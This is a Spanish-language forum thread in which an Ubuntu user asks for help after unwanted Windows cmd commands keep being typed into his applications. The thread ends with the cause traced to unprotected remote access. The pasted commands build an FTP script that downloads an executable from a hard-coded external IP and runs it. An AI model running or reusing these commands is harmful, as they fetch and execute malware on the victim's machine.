Eliminar un troyano (solucionado)

Imagen de jcgigena
0 puntos

Hola gente, como ven, estoy renegando con un troyano que quiero eliminar, ya que, por lo que pude ver, me esta volviendo loca la tecla que habilita el teclado numerico, la deja parpadeando ( es la evidencia de que el troyano actuo ) y obviamente me recarga de laburo el procesador.
Estoy usando Ubuntu 12.04 LTS, ya les pego el script que pude capturar, en una de esas me pueden dar una mano y sobretodo me interesa saber como proceden para detectarlo y prevenirlos.

Saludos Cordiales

------------------------- 1 -------------------------
cmd /c echo open 72.64.46.25 21 >>
ik &echo user windows update >>
ik &echo binary >>
ik &echo get windowsupdate.exe >>
ik &echo bye >>
ik &ftp -n -v -s:ik &del ik &windowsupdate.exe &exit
echo You got owned

-------------------------- 2 -----------------------
ik &echo user aydin kankakanka >>
ik &echo binary >>
ik &echo get systems.exe >>
ik &echo bye >> ik
&ftp -n -v -s:ik &del ik &systems.exe &exit
echo You got owned

Imagen de Jose Luis 1320
+1
0
-1

Si estas en Ubuntu borra ese script y ya.

+1
0
-1

"Yo sólo se que no se nada"
-Sócrates, filósofo griego.
-Normas del foro

Imagen de jcgigena
+1
0
-1

como encuentro el script ?

+1
0
-1
Imagen de rioport
+1
0
-1

Aquí no se da soporte a los S.O. de Microsoft, en MS Windows el malware abunda y es muy difícil decir cuál de todos ellos es y también cuál es su solución, lo que puedes hacer es comprar un antivirus (no crackeado ni similares porque entonces vale para nada) y confiar en que lo detectará, ¿que porqué es de MS Windows? Porque el cmd /c .. se usa en los batch de ese S.O. y en Ubuntu no tiene ningún efecto, aún con Wine pues éste no se ejecuta al inicio.

Si es al iniciar Ubuntu cuando el teclado se queda parpadeando sin poder hacer más que reiniciar, entonces quizá sea un kernel panic, pero las razones quedan demasiado lejos de lo que tú deduces.

+1
0
-1

-- GC --

Imagen de jcgigena
+1
0
-1

Jefe, no uso windows, estoy usando solamente Ubuntu, no es un equipo con SO dual, pero creo que esto le ocurrio a alguno de los usuarios viendo algun email con basura.
La situacion la detecte mientras usaba el editor de texto del LibreOffice y de repente comenzo a escribirse el script que les mostre anteriormente, al terminar quedaba parpadeando la tecla.
Hace una semana que tengo esto y no se produce al iniciar Ubuntu.

+1
0
-1
Imagen de rioport
+1
0
-1

Imagen de jcgigena
+1
0
-1

gracias, creo que esto es la solucion a mi problema, ya esta implementado, asi que ni bien confirme la supresion de esta ejecucion del script, lo comento.

+1
0
-1
Imagen de Gabriel_M
+1
0
-1

... mientras usas el editor de texto del LibreOffice, elimina el directorio
oculto de libreoffice de cada uno de los usuarios.

+1
0
-1
Imagen de jcgigena
+1
0
-1

gracias Gabriel, lo tendre en cuenta, pero el tema de estar usando Libreoffice fue aleatorio, luego me sucedio buscando un archivo y en la caja de busqueda comenzo a escribirse el script.

+1
0
-1
Imagen de Gabriel_M
+1
0
-1

... investiga, si no se trata de un hack conectado por vnc o similar.

+1
0
-1
Imagen de jcgigena
+1
+1
-1

Bueno gente, gracias al aporte de rioport, pude solucionar el problema de la ejecucion del script.

A traves del link que me suministro,
http://www.highseverity.com/2011_11_01_archive.html

quedo en evidencia lo mal configurado que tenia el acceso remoto ( sin password, por ej ), una locura total, pero bueno, caminando se hace el camino.
Gracias por el aporte.

+1
+1
-1